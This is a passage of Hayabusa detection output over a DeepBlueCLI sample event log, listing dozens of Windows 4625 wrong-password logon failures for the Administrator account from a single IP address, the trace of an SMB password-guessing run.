NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: 